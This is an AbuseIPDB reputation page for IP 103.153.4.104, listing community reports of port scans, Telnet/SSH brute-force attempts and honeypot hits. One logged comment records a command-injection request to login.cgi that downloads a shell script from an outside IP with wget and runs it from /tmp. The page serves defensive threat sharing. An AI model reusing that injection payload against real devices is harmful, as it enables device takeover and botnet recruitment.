JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 103.153.4.104

103.153.4.104 was found in our database!

This IP was reported 24 times. Confidence of Abuse is 100%: ?

100%

ISP	Shenzhen Guocai Electronic Trading Co., Ltd.
Usage Type	Data Center/Web Hosting/Transit
ASN	AS42960
Domain Name	xn.net
Country	🇭🇰 Hong Kong
City	Tuen Mun, Tuen Mun

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 103.153.4.104

Whois 103.153.4.104

IP Abuse Reports for 103.153.4.104:

This IP address has been reported a total of 24 times from 18 distinct sources. 103.153.4.104 was first reported on June 16th 2026, and the most recent report was 1 hour ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇺🇸 NXTwoThou	2026-06-17 12:45:25 (1 hour ago)	/login.cgi%3Fcli=aa%20aa%27;wget%20http://109.104.153.60/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$	Web App Attack
🇳🇱 StopAbuse	2026-06-17 12:17:50 (1 hour ago)	tcp/2323	Port Scan
🇦🇺 FEWA	2026-06-17 10:57:40 (2 hours ago)	Fail2Ban Ban Triggered	Hacking Brute-Force
🇩🇪 guldkage	2026-06-17 09:40:22 (4 hours ago)	Unauthorized connection attempt detected from IP address 103.153.4.104 to port 23 (ger-03) [M]	Brute-Force Exploited Host
🇺🇸 RAP	2026-06-17 08:57:47 (4 hours ago)	2026-06-17 08:57:47 UTC Unauthorized activity to TCP port 23. Telnet	Port Scan
🇺🇸 Xarcotic	2026-06-17 08:10:04 (5 hours ago)	SSH login on honeypot.	Brute-Force SSH
🇩🇪 Yachiyo Runami	2026-06-17 07:58:03 (5 hours ago)	Port Scan on Honeypot \| Ports: 23/Telnet \| Proto: TCP(1) \| Flags: all SYN \| TTL: 51 \| Len: 44B \| Win ... show more Port Scan on Honeypot \| Ports: 23/Telnet \| Proto: TCP(1) \| Flags: all SYN \| TTL: 51 \| Len: 44B \| Win: 17608(1) \| F2B/ufw-honeypot@2026-06-17T07:58:03Z show less	Port Scan Hacking
🇺🇸 MPL	2026-06-17 04:23:26 (9 hours ago)	tcp/23	Port Scan
🇩🇪 andorin	2026-06-17 04:04:54 (9 hours ago)	SSH/Telnet honeypot (endlessh) on habith.eu: 1 connection attempts trapped, total tarpit time 20s. A ... show more SSH/Telnet honeypot (endlessh) on habith.eu: 1 connection attempts trapped, total tarpit time 20s. Automated report. show less	Port Scan Brute-Force SSH
🇺🇸 RAP	2026-06-17 03:40:46 (10 hours ago)	2026-06-17 03:40:46 UTC Unauthorized activity to TCP port 23. Telnet	Port Scan
🇳🇱 COMPLEX	2026-06-17 01:38:07 (12 hours ago)	Unsolicited TCP traffic \| Action: DROP \| Port 23	Brute-Force
🇺🇸 RAP	2026-06-17 01:16:03 (12 hours ago)	2026-06-17 01:16:03 UTC Unauthorized activity to TCP port 23. Telnet	Port Scan
🇬🇧 PeravixGroup	2026-06-17 00:56:32 (12 hours ago)	Honeypot detection: Telnet / IoT device brute-force or exploitation attempt on port 23. Severity: ME ... show more Honeypot detection: Telnet / IoT device brute-force or exploitation attempt on port 23. Severity: MEDIUM. Aaran.cloud show less	IoT Targeted Brute-Force
🇺🇸 RAP	2026-06-17 00:18:17 (13 hours ago)	2026-06-17 00:18:17 UTC Unauthorized activity to TCP port 2323. Telnet	Port Scan
🇺🇸 cybsecaoccol	2026-06-16 23:47:17 (14 hours ago)	unauthorized connection or malicious port scan attempted on tcp port - corp	Port Scan Hacking

Showing 1 to 15 of 24 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇰🇷 211.185.23.242

🇳🇱 91.92.40.6

🇺🇸 66.132.186.244

🇰🇷 59.23.20.15

🇱🇹 46.29.234.127

🇬🇧 31.14.254.69

🇸🇪 176.74.192.60

🇺🇸 170.9.14.123

🇺🇸 74.249.192.245

🇮🇳 74.125.178.152

🇱🇹 45.227.254.170

🇺🇸 35.238.251.200

🇺🇸 20.64.106.39

🇮🇩 2406:da19:776:6e01:57a2:a268:fa2e:768b

🇰🇷 221.147.36.59

🇺🇸 195.184.76.204

🇸🇪 185.143.12.195

🇰🇷 112.175.29.94

🇹🇼 111.70.7.136

🇩🇪 69.5.169.136